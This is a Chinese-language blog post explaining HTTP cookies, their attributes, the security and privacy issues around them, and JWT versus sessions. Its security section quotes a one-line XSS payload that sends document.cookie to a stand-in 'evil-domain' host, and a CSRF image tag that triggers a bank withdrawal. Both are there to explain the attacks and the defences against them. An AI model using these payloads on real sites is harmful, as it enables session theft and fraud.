<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">






  
  
  <link rel="stylesheet" media="all" href="/lib/Han/dist/han.min.css?v=3.3">




<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="base," />










<meta name="description" content="cookies起源早期Web开发面临的最大问题之一是如何管理状态。简言之，服务器端没有办法知道两个请求是否来自于同一个浏览器。那时的办法是在请求的页面中插入一个token，并且在下一次请求中将这个token返回（至服务器）。这就需要在form中插入一个包含token的隐藏表单域，或着在URL的qurey字符串中传递该token。这两种办法都强调手工操作并且极易出错。 ​    LouMontull">
<meta name="keywords" content="base">
<meta property="og:type" content="article">
<meta property="og:title" content="cookies 深入理解">
<meta property="og:url" content="https://leolinf.github.io/2019/01/21/cookies/index.html">
<meta property="og:site_name" content="leolinf 的博客">
<meta property="og:description" content="cookies起源早期Web开发面临的最大问题之一是如何管理状态。简言之，服务器端没有办法知道两个请求是否来自于同一个浏览器。那时的办法是在请求的页面中插入一个token，并且在下一次请求中将这个token返回（至服务器）。这就需要在form中插入一个包含token的隐藏表单域，或着在URL的qurey字符串中传递该token。这两种办法都强调手工操作并且极易出错。 ​    LouMontull">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190109143109759.png?raw=true">
<meta property="og:image" content="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190117154201742.png?raw=true">
<meta property="og:image" content="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190117161532326.png?raw=true">
<meta property="og:updated_time" content="2019-10-31T02:11:03.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="cookies 深入理解">
<meta name="twitter:description" content="cookies起源早期Web开发面临的最大问题之一是如何管理状态。简言之，服务器端没有办法知道两个请求是否来自于同一个浏览器。那时的办法是在请求的页面中插入一个token，并且在下一次请求中将这个token返回（至服务器）。这就需要在form中插入一个包含token的隐藏表单域，或着在URL的qurey字符串中传递该token。这两种办法都强调手工操作并且极易出错。 ​    LouMontull">
<meta name="twitter:image" content="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190109143109759.png?raw=true">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://leolinf.github.io/2019/01/21/cookies/"/>





  <title>cookies 深入理解 | leolinf 的博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">leolinf 的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">人生苦短我用 py</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://leolinf.github.io/2019/01/21/cookies/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="linfan">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="leolinf 的博客">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">cookies 深入理解</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-21T11:14:47+08:00">
                2019-01-21
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-10-31T10:11:03+08:00">
                2019-10-31
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术/" itemprop="url" rel="index">
                    <span itemprop="name">技术</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/01/21/cookies/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2019/01/21/cookies/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/01/21/cookies/" class="leancloud_visitors" data-flag-title="cookies 深入理解">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body han-init-context" itemprop="articleBody">

      
      

      
        <h3 id="cookies起源"><a href="#cookies起源" class="headerlink" title="cookies起源"></a>cookies起源</h3><p>早期Web开发面临的最大问题之一是如何管理状态。简言之，服务器端没有办法知道两个请求是否来自于同一个浏览器。那时的办法是在请求的页面中插入一个token，并且在下一次请求中将这个token返回（至服务器）。这就需要在form中插入一个包含token的隐藏表单域，或着在URL的qurey字符串中传递该token。这两种办法都强调手工操作并且极易出错。</p>
<p>​    <strong>LouMontulli</strong> 那时是网景通讯的一个雇员，被认为在1994年将“<strong>magic cookies</strong>”的概念应用到了web通讯中。他意图解决的是web中的购物车，现在所有购物网站都依赖购物车。他的最早的说明文档提供了一些cookies工作原理的基本信息该文档在<strong>RFC2109</strong>中被规范化（这是所有浏览器实现cookies的参考依据），并且最终逐步形成了<strong>REF2965</strong>.<strong>Montulli</strong>最终也被授予了关于cookies的美国专利。网景浏览器在它的第一个版本中就开始支持cookies，并且当前所有web浏览器都支持cookies。</p>
<h3 id="cookie是什么"><a href="#cookie是什么" class="headerlink" title="cookie是什么"></a>cookie是什么</h3><p>​       坦白的说，一个cookie就是存储在用户主机浏览器中的一小段文本文件。Cookies是纯文本形式，它们不包含任何可执行代码。一个Web页面或服务器告之浏览器来将这些信息存储并且基于一系列规则在之后的每个请求中都将该信息返回至服务器。Web服务器之后可以利用这些信息来标识用户。多数需要登录的站点通常会在你的认证信息通过后来设置一个cookie，之后只要这个cookie存在并且合法，你就可以自由的浏览这个站点的所有部分。再次，cookie只是包含了数据，就其本身而言并不有害。Cookie使基于无状态的HTTP协议记录稳定的状态信息成为了可能。</p>
<h3 id="cookie-的作用"><a href="#cookie-的作用" class="headerlink" title="cookie 的作用"></a>cookie 的作用</h3><p>Cookie主要用于以下三个方面：</p>
<ul>
<li>会话状态管理（如用户登录状态、购物车、游戏分数或其它需要记录的信息）</li>
<li>个性化设置（如用户自定义设置、主题等）</li>
<li>浏览器行为跟踪（如跟踪分析用户行为等）</li>
</ul>
<p>Cookie曾一度用于客户端数据的存储，因当时并没有其它合适的存储办法而作为唯一的存储手段，但现在随着现代浏览器开始支持各种各样的存储方式，Cookie渐渐被淘汰。由于服务器指定Cookie后，浏览器的每次请求都会携带Cookie数据，会带来额外的性能开销（尤其是在移动环境下）。新的浏览器API已经允许开发者直接将数据存储到本地，如使用 Web storage API（本地存储和会话存储）或 IndexedDB。</p>
<h3 id="cookie-创建"><a href="#cookie-创建" class="headerlink" title="cookie 创建"></a>cookie 创建</h3><p>当服务器收到HTTP请求时，服务器可以在响应头里面添加一个<code>Set-Cookie</code>选项。浏览器收到响应后通常会保存下Cookie，之后对该服务器每一次请求中都通过<code>Cookie</code>请求头部将Cookie信息发送给服务器。另外，Cookie的过期时间、域、路径、有效期、适用站点都可以根据需要来指定。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: value [ ;expires=date][ ;domain=domain][ ;path=path][ ;secure][ ;httponly][;samesite=strict]</span><br></pre></td></tr></table></figure>
<p>消息头的第一部分，value部分，通常是一个name=value格式的字符串。事实上，原始手册指示这是应该使用的格式，但是浏览器对cookie的所有值并不会按此格式校验。实际上，你可以指定一个不包含等号的字符串并且它同样会被存储。然而，通常性的使用方式是以name=value的格式（并且多数的接口只支持该格式）来指定cookie的值。</p>
<ul>
<li><strong>name</strong>: 可以是除了控制字符 (CTLs)、空格 (spaces) 或制表符 (tab)之外的任何 US-ASCII 字符。同时不能包含以下分隔字符： ( ) &lt; &gt; @ , ; : \ “ /  [ ] ? = { }.</li>
<li><strong>value</strong>: 是可选的，如果存在的话，那么需要包含在双引号里面。支持除了控制字符（CTLs）、空格（whitespace）、双引号（double quotes）、逗号（comma）、分号（semicolon）以及反斜线（backslash）之外的任意 US-ASCII 字符。<strong>关于编码</strong>：许多应用会对 cookie 值按照URL编码（URL encoding）规则进行编码，但是按照 RFC 规范，这不是必须的。不过满足规范中对于 <cookie-value> 所允许使用的字符的要求是有用的。</cookie-value></li>
</ul>
<p>当一个cookie存在，并且可选条件允许的话，该cookie的值会在接下来的每个请求中被发送至服务器。cookie的值被存储在名为Cookie的HTTP消息头中，并且只包含了cookie的值，其它的选项全部被去除。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie : name=value</span><br></pre></td></tr></table></figure>
<p>通过Set-Cookie指定的选项只是应用于浏览器端，一旦选项被设置后便不会被服务器重新取回。cookie的值与Set-Cookie中指定的值是完全一样的字符串；对于这些值不会有更近一步的解析或转码操作。如果在指定的请求中有多个cookies，那么它们会被分号和空格分开，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie:name=value1 ; name=value2 ; name1=value1</span><br></pre></td></tr></table></figure>
<p><strong>cookie</strong>中<strong>value</strong>的大小以及数量的限制，详情查看<a href="http://browsercookielimits.squawky.net" target="_blank" rel="noopener">http://browsercookielimits.squawky.net</a></p>
<p>下面是两个特殊的 name 前缀：</p>
<ul>
<li><strong>__Secure- 前缀</strong>：以 __Secure- 为前缀的 cookie（其中连接符是前缀的一部分），必须与 secure 属性一同设置，同时必须应用于安全页面（即使用 HTTPS 访问的页面）。（对于不支持的客服端，无法保证）</li>
<li><strong>__Host- 前缀：</strong> 以 __Host- 为前缀的 cookie，必须与 secure 属性一同设置，必须应用于安全页面（即使用 HTTPS 访问的页面），必须不能设置 domain 属性 （也就不会发送给子域），同时 path 属性的值必须为“/”。（对于不支持的客服端，无法保证）</li>
</ul>
<h4 id="Expires和Max-Age-选项"><a href="#Expires和Max-Age-选项" class="headerlink" title="Expires和Max-Age 选项"></a>Expires和Max-Age 选项</h4><ul>
<li><code>Expires</code> 为 Cookie 的删除设置一个过期的<strong>日期</strong></li>
<li><code>Max-age</code> 设置一个 Cookie 将要过期的<strong>秒数</strong></li>
</ul>
<p>如果两个参数都不设定，又叫 session Cookie是最简单的Cookie：浏览器关闭之后它会被自动删除，也就是说它仅在会话期内有效。会话期Cookie不需要指定过期时间（<code>Expires</code>）或者有效期（Max-Age）。需要注意的是，有些浏览器提供了会话恢复功能，这种情况下即使关闭了浏览器，会话期Cookie也会被保留下来，就好像浏览器从来没有关闭一样。</p>
<p>与上面相反的就是，持久性Cookie可以指定一个特定的过期时间（<code>Expires</code>）或有效期（<code>Max-Age</code>）。当Cookie的过期时间被设定时，设定的日期和时间只与客户端相关，而不是服务端。</p>
<p><strong>同时设定expires 和 max-age</strong>所有支持 <code>max-age</code> 的浏览器会忽略 <code>expires</code> 的值，只有 IE 另外，IE 会忽略 <code>max-age</code> 只支持 <code>expires</code>；<br><strong>如果我只设了 max-age</strong>，除了 IE 之外的所有浏览器会正确的使用它。在 IE 浏览器中，这个 Cookie 将会作为一个 Session Cookie（当你关闭浏览器时它会被删除）；<br><strong>如果我只设了 expires</strong>，所有浏览器会正确使用它来保存 Cookie，只需要记得像上边示例那样设置它的 GMT 时间就行了。</p>
<p>如果maxAge为负数，则表示该Cookie仅在本浏览器窗口以及本窗口打开的子窗口内有效，关闭窗口后该Cookie即失效。maxAge为负数的Cookie，为临时性Cookie，不会被持久化，不会被写到Cookie文件中。Cookie信息保存在浏览器内存中，因此关闭浏览器该Cookie就消失了。Cookie默认的maxAge值为-1。</p>
<p>如果maxAge为0，则表示删除该Cookie。Cookie机制没有提供删除Cookie的方法，因此通过设置该Cookie即时失效实现删除Cookie的效果。失效的Cookie会被浏览器从Cookie文件或者内存中删除，</p>
<p>总结：为了兼容更多的浏览器，设定 expires 来持久化 cookies</p>
<h4 id="Domain-选项"><a href="#Domain-选项" class="headerlink" title="Domain 选项"></a>Domain 选项</h4><p>指示cookie将要发送到哪个域或哪些域中。默认情况下，<strong>domain</strong>会被设置为创建该cookie的页面所在的域名,并且只能当前页面的域名可以访问 cookie, 相应的子域名都不行访问该 cookie。而<strong>domain</strong>选项被用来扩展cookie值所要发送域的数量。</p>
<p>如果指定了<code>Domain</code>，则一般包含子域名。浏览器会对domain的值与请求所要发送至的域名，做一个尾部比较（即从字符串的尾部开始比较），并且在匹配后发送一个Cookie消息头。 domain设置的值必须是发送Set-Cookie消息头的域名</p>
<p>总结：cookie 如果不指定domain，只能当前域名下访问。子域名上可以指定domain 到当前域名或者当前域名的父域名。当前域名可以加载出当前域名和对应的父域名的cookie</p>
<p>例如：如果设置<code>Domain=laowang.com</code>，则Cookie也包含在子域名中（如<code>developer.laowang.com</code>,<code>test.developer.laowang.com</code>）</p>
<h4 id="Path选项"><a href="#Path选项" class="headerlink" title="Path选项"></a>Path选项</h4><p>​       另一个控制何时发送Cookie消息头的方式是指定path选项。与domain选项相同的是，path指明了在发Cookie消息头之前必须在请求资源中存在一个URL路径。这个比较是通过将path属性值与请求的URL从头开始逐字符串比较完成的。如果字符匹配在这个例子中，Path 标识指定了主机下的哪些路径可以接受Cookie（该URL路径必须存在于请求URL中）。以字符 <code>%x2F</code> (“/“) 作为路径分隔符，子路径也会被匹配。</p>
<p>例如，设置 <code>Path=/docs</code>，则以下地址都会匹配：</p>
<ul>
<li><code>/docs</code></li>
<li><code>/docs/Web/</code></li>
<li><code>/docs/Web/HTTP</code></li>
</ul>
<p>要注意的是只有在domain选项核实完毕之后才会对path属性进行比较。path属性的默认值是发送Set-Cookie消息头所对应的URL中的path部分。</p>
<h4 id="Secure选项"><a href="#Secure选项" class="headerlink" title="Secure选项"></a>Secure选项</h4><p>该选项只是一个标记并且没有其它的值。一个secure cookie只有当请求是通过SSL和HTTPS创建时，才会发送到服务器端。这种cookie的内容意指具有很高的价值并且可能潜在的被破解以纯文本形式传输，现实中，机密且敏感的信息绝不应该在cookie中存储或传输，因为cookies的整个机制都是原本不安全的。默认情况下，在HTTPS链接上传输的cookies都会被自动添加上secure选项，不安全的站点（<code>http:</code>）无法使用Cookie的 <code>Secure</code> 标记。从 Chrome 52 和 Firefox 52 开始，不安全的站点（http:）已经不能再在 cookie 中设置 “secure”  指令了。</p>
<h4 id="HTTP-Only选项"><a href="#HTTP-Only选项" class="headerlink" title="HTTP-Only选项"></a>HTTP-Only选项</h4><p>HTTP-Only背后的意思是告之浏览器该cookie绝不应该通过Javascript的document.cookie属性访问。设计该特征意在提供一个安全措施来帮助阻止通过Javascript发起的跨站脚本攻击(XSS)窃取cookie的行为 一旦设定这个标记，通过documen.coookie则不能再访问该cookie。如果包含服务端 Session 信息的 Cookie 不想被客户端 JavaScript 脚本调用，那么就应该为其设置 <code>HttpOnly</code> 标记。你也不能通过JavaScript设置HTTP-only cookies，因为你不能再通过JavaScript读取这些cookies。</p>
<h4 id="SameSite选项"><a href="#SameSite选项" class="headerlink" title="SameSite选项"></a>SameSite选项</h4><p><code>SameSite</code> Cookie允许服务器要求某个cookie在跨站请求时不会被发送，从而可以阻止跨站请求伪造攻击<strong>CSRF</strong>。但目前<code>SameSite</code> Cookie还处于实验阶段，并不是所有浏览器都支持。</p>
<p><strong>SameSite=Strict</strong>：</p>
<p>严格模式，表明这个 cookie 在任何情况下都不可能作为第三方 cookie，绝无例外。比如说假如 b.com 设置了如下 cookie：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: foo=1; SameSite=Strict</span><br><span class="line">Set-Cookie: bar=2</span><br></pre></td></tr></table></figure>
<p>你在 a.com 下发起的对 b.com 的任意请求中，foo 这个 cookie 都不会被包含在 Cookie 请求头中，但 bar 会。举个实际的例子就是，假如淘宝网站用来识别用户登录与否的 cookie 被设置成了 SameSite=Strict，那么用户从百度搜索页面甚至天猫页面的链接点击进入淘宝后，淘宝都不会是登录状态，因为淘宝的服务器不会接受到那个 cookie，其它网站发起的对淘宝的任意请求都不会带上那个 cookie。</p>
<p><strong>SameSite=Lax</strong>：</p>
<p>宽松模式，比 Strict 放宽了点限制：假如这个请求是我上面总结的那种同步请求（改变了当前页面或者打开了新页面）且同时是个 GET 请求（因为从语义上说 GET 是读取操作，比 POST 更安全），则这个 cookie 可以作为第三方 cookie。比如说假如 b.com 设置了如下 cookie：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: foo=1; SameSite=Strict</span><br><span class="line">Set-Cookie: bar=2; SameSite=Lax</span><br><span class="line">Set-Cookie: baz=3</span><br></pre></td></tr></table></figure>
<p>当用户从 a.com 点击链接进入 b.com 时，foo 这个 cookie 不会被包含在 Cookie 请求头中，但 bar 和 baz 会，也就是说用户在不同网站之间通过链接跳转是不受影响了。但假如这个请求是从 a.com 发起的对 b.com 的异步请求，或者页面跳转是通过表单的 post 提交触发的，则 bar 也不会发送。</p>
<p><img src="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190109143109759.png?raw=true" alt="image-20190109143109759.png"></p>
<h3 id="安全"><a href="#安全" class="headerlink" title="安全"></a>安全</h3><h5 id="会话劫持和-xss-跨站脚本攻击"><a href="#会话劫持和-xss-跨站脚本攻击" class="headerlink" title="会话劫持和 xss(跨站脚本攻击)"></a>会话劫持和 xss(跨站脚本攻击)</h5><p>在Web应用中，Cookie常用来标记用户或授权会话。因此，如果Web应用的Cookie被窃取，可能导致授权用户的会话受到攻击。常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行<a href="https://developer.mozilla.org/en-US/docs/Glossary/XSS" target="_blank" rel="noopener">XSS</a>攻击。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">new</span> Image()).src = <span class="string">"http://www.evil-domain.com/steal-cookie.php?cookie="</span> + <span class="built_in">document</span>.cookie;</span><br></pre></td></tr></table></figure>
<p><code>HttpOnly</code>类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。</p>
<h5 id="跨站请求伪造（CSRF）"><a href="#跨站请求伪造（CSRF）" class="headerlink" title="跨站请求伪造（CSRF）"></a>跨站请求伪造（CSRF）</h5><p>已经给了一个比较好的<a href="https://developer.mozilla.org/en-US/docs/Glossary/CSRF" target="_blank" rel="noopener">CSRF</a>例子。比如在不安全聊天室或论坛上的一张图片，它实际上是一个给你银行服务器发送提现的请求：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>当你打开含有了这张图片的HTML页面时，如果你之前已经登录了你的银行帐号并且Cookie仍然有效（还没有其它验证步骤），你银行里的钱很可能会被自动转走。有一些方法可以阻止此类事件的发生：</p>
<ul>
<li>对用户输入进行过滤来阻止<a href="https://developer.mozilla.org/en-US/docs/Glossary/XSS" target="_blank" rel="noopener">XSS</a>；</li>
<li>任何敏感操作都需要确认；</li>
<li>用于敏感信息的Cookie只能拥有较短的生命周期；等等</li>
</ul>
<h3 id="追踪和隐私"><a href="#追踪和隐私" class="headerlink" title="追踪和隐私"></a>追踪和隐私</h3><h5 id="第三方Cookie"><a href="#第三方Cookie" class="headerlink" title="第三方Cookie"></a>第三方Cookie</h5><p>每个Cookie都会有与之关联的域（Domain），如果Cookie的域和页面的域相同，那么我们称这个Cookie为<em>第一方Cookie</em>（<em>first-party cookie</em>），如果Cookie的域和页面的域不同，则称之为<em>第三方Cookie</em>（<em>third-party cookie</em>.）。一个页面包含图片或存放在其他域上的资源（如图片广告）时，第一方的Cookie也只会发送给设置它们的服务器。通过第三方组件发送的第三方Cookie主要用于广告和网络追踪。这方面可以看谷歌使用的Cookie类型（<a href="https://www.google.com/policies/technologies/types/" target="_blank" rel="noopener">types of cookies used by Google</a>）。大多数浏览器默认都允许第三方Cookie，但是可以通过附加组件来阻止第三方Cookie（如<a href="https://www.eff.org/" target="_blank" rel="noopener">EFF</a>的<a href="https://addons.mozilla.org/en-US/firefox/addon/privacy-badger-firefox/" target="_blank" rel="noopener">Privacy Badger</a>）。<br>如果你没有公开你网站上第三方Cookie的使用情况，当它们被发觉时用户对你的信任程度可能受到影响。一个较清晰的声明（比如在隐私策略里面提及）能够减少或消除这些负面影响。在某些国家已经开始对Cookie制订了相应的法规，可以查看维基百科上例子<a href="https://wikimediafoundation.org/wiki/Cookie_statement" target="_blank" rel="noopener">cookie statement</a>。</p>
<h5 id="禁止追踪Do-Not-Track"><a href="#禁止追踪Do-Not-Track" class="headerlink" title="禁止追踪Do-Not-Track"></a>禁止追踪Do-Not-Track</h5><p>虽然并没有法律或者技术手段强制要求使用<a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/DNT" target="_blank" rel="noopener"><code>DNT</code></a>，但是通过<a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/DNT" target="_blank" rel="noopener"><code>DNT</code></a>可以告诉Web程序不要对用户行为进行追踪或者跨站追踪。查看<a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/DNT" target="_blank" rel="noopener"><code>DNT</code></a>以获取更多信息。</p>
<h5 id="欧盟Cookie指令"><a href="#欧盟Cookie指令" class="headerlink" title="欧盟Cookie指令"></a>欧盟Cookie指令</h5><p>关于Cookie，欧盟已经在<a href="http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:32009L0136" target="_blank" rel="noopener">2009/136/EC指令</a>中提了相关要求，该指令已于2011年5月25日生效。虽然指令并不属于法律，但它要求欧盟各成员国通过制定相关的法律来满足该指令所提的要求。当然，各国实际制定法律会有所差别。<br>该欧盟指令的大意：在征得用户的同意之前，网站不允许通过计算机、手机或其他设备存储、检索任何信息。自从那以后，很多网站都在网站声明中添加了相关说明，告诉用户他们的Cookie将用于何处。<br>可以通过<a href="https://en.wikipedia.org/wiki/HTTP_cookie#EU_cookie_directive" target="_blank" rel="noopener">维基百科的相关内容</a>获取最新的各国法律和更精确的信息。</p>
<h5 id="僵尸Cookie和删不掉的Cookie"><a href="#僵尸Cookie和删不掉的Cookie" class="headerlink" title="僵尸Cookie和删不掉的Cookie"></a>僵尸Cookie和删不掉的Cookie</h5><p>Cookie的一个极端使用例子是僵尸Cookie（或称之为“删不掉的Cookie”），这类Cookie较难以删除，甚至删除之后会自动重建。它们一般是使用<a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API" target="_blank" rel="noopener">Web storage API</a>、Flash本地共享对象或者其他技术手段来达到的。</p>
<h3 id="JWT和-SESSION-对比"><a href="#JWT和-SESSION-对比" class="headerlink" title="JWT和 SESSION 对比"></a>JWT和 SESSION 对比</h3><p>JWT是一种无状态的鉴权机制。将用户登录后的一些信息（比如用户Id）和过期时间等信息存储在一个加密过的字符串中,当服务器收到请求的时候，进行解密并直接使用信息<br> JWT的组成：使用base64编码描述jwt的头部、使用base64编码的payload、以及加密签名<br> 缺点，服务器无法像session一样方便地管理用户登录状态</p>
<p>JWT认证流程：</p>
<p><img src="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190117154201742.png?raw=true" alt="image-20190117154201742.png"></p>
<p>session 认证流程：</p>
<p><img src="https://github.com/leolinf/hexo-blog/blob/master/source/_posts/images/image-20190117161532326.png?raw=true" alt="image-20190117161532326"></p>
<p><strong>1.可伸缩性：</strong>随着应用程序的增长和用户群的增加，您必须水平或垂直开始扩展。 会话数据通过文件或数据库存储在服务器的内存中。 在水平扩展方案中，您必须开始复制服务器，您必须提供一个单独的中央会话存储系统，您的所有应用程序服务器都可以访问该系统。 否则，由于会话存储缺陷，您将无法扩展应用程序。 解决这一挑战的另一种方法是使用[粘性会话]的概念。 您还可以将会话存储在磁盘上，以便在云环境中轻松扩展应用程序。 这些类型的变通办法并不能很好地适应现代大型应用程序。 建立和维护这种类型的分布式系统涉及深入的技术知识，并随后导致更高的财务成本。 在这种情况下，使用JWT是无缝的; 由于基于令牌的身份验证是无状态的，因此无需在会话中存储用户信息。 我们的应用程序可以轻松扩展，因为我们可以使用令牌来访问来自不同服务器的资源，而无需担心用户是否实际登录到特定服务器。 您还可以节省成本，因为您不需要专用服务器来存储会话。 为什么？ 因为没有会话！</p>
<p><strong>注意：</strong>如果您正在构建绝对不需要扩展到在多个服务器上运行且不需要RESTful API的小型应用程序，那么会话肯定适合您。 如果您可以使用专用服务器为会话存储运行Redis等工具，那么会话也可能完美适合您！</p>
<p><strong>2. RESTful API服务：</strong>现代应用程序的一种常见模式是从RESTful API检索和使用JSON数据。 如今，大多数应用程序都有RESTful API供其他开发人员或应用程序使用。 从API提供数据有几个明显的优点，其中之一就是能够在多个应用程序中使用数据。 在这种情况下，将会话和cookie用于用户身份的传统方法效果不佳，因为它们将<strong>状态</strong>引入应用程序。</p>
<p>RESTful API的原则之一是它应该是无状态的，这意味着当发出请求时，总是可以预期某些参数内的响应而没有副作用。 用户的身份验证状态引入了这样的副作用，这违反了这一原则。 保持API无状态，因此没有副作用意味着可维护性和调试变得更加容易。</p>
